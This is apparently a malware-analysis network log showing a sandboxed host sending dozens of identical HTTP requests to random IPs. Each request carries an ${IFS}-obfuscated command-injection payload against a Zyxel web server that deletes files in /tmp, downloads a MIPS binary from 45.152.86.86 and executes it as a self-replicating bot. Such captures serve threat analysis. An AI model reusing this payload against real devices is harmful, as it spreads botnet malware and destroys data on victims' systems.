                                        Mar 31, 2024 09:21:02.618483067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3194192.168.2.2354604221.231.197.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.618539095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3195192.168.2.236066423.32.232.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.618596077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3196192.168.2.2348368179.201.214.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.618658066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3197192.168.2.233511644.63.178.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.618721008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3198192.168.2.2335922180.203.46.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.619113922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3199192.168.2.233378644.109.246.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.619169950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3200192.168.2.2353020187.149.102.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.632843018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3201192.168.2.233404844.234.200.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633018017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3202192.168.2.23370544.18.141.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633021116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3203192.168.2.23425921.171.137.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633022070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3204192.168.2.2340684175.49.81.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633044004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3205192.168.2.2349798102.188.163.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633044004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3206192.168.2.2352206135.151.154.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633063078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3207192.168.2.234900812.32.0.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633064985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3208192.168.2.234753898.224.162.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633183002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3209192.168.2.2351460113.94.50.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633244038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3210192.168.2.2338868142.245.110.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633311033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3211192.168.2.2360066207.26.194.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633362055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3212192.168.2.2347610140.252.91.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633399010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3213192.168.2.2359678148.196.48.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633471966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3214192.168.2.2351980195.165.25.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633522034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3215192.168.2.2341748160.34.114.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633568048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3216192.168.2.236014412.131.90.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633635998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3217192.168.2.2358388204.124.128.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633692026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3218192.168.2.2350818156.240.70.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633754015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3219192.168.2.2344590122.129.76.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633804083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3220192.168.2.234040257.35.192.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633866072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3221192.168.2.2337692102.96.94.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633922100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3222192.168.2.2348866119.49.111.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.633965015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3223192.168.2.233450488.133.12.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634022951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3224192.168.2.2348204140.36.176.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634105921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3225192.168.2.233582289.38.147.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634154081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3226192.168.2.235450027.236.112.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634213924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3227192.168.2.2334272117.146.149.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634264946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3228192.168.2.233366279.32.117.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634315968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3229192.168.2.2356006208.105.139.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634371996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3230192.168.2.235984638.94.156.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634438038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3231192.168.2.2345040103.198.135.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634495974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3232192.168.2.235734627.108.254.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634543896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3233192.168.2.235133097.33.164.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634584904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3234192.168.2.2338076146.224.220.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634649992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3235192.168.2.2342044102.52.61.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634706020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3236192.168.2.235355297.121.142.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634753942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3237192.168.2.234846034.104.118.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634810925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3238192.168.2.2334940211.213.219.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634922981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3239192.168.2.2359562165.140.106.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.634968996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3240192.168.2.2355036154.38.80.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635023117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3241192.168.2.233819046.44.210.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635093927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3242192.168.2.2345244122.130.43.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635154963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3243192.168.2.235285858.161.252.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635219097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3244192.168.2.235331071.116.174.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635276079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3245192.168.2.234148873.10.183.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635312080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3246192.168.2.2358900100.8.116.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635382891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3247192.168.2.234990039.234.171.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635447979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3248192.168.2.2350620182.126.92.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635507107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3249192.168.2.2360280217.229.48.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635560036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3250192.168.2.235650681.241.150.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635620117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3251192.168.2.234476075.2.164.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635675907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3252192.168.2.2353332192.8.149.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635756969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3253192.168.2.2357158129.22.203.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635802984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3254192.168.2.234555046.143.95.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635865927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3255192.168.2.235967279.0.0.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635909081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3256192.168.2.2344026167.176.184.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.635982037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3257192.168.2.2345228204.32.195.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636043072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3258192.168.2.234831238.170.253.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636094093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3259192.168.2.2339034160.239.25.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636159897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3260192.168.2.2356126205.186.28.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636209011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3261192.168.2.2353932128.88.226.61443
                                        TimestampBytes transferredDirectionData
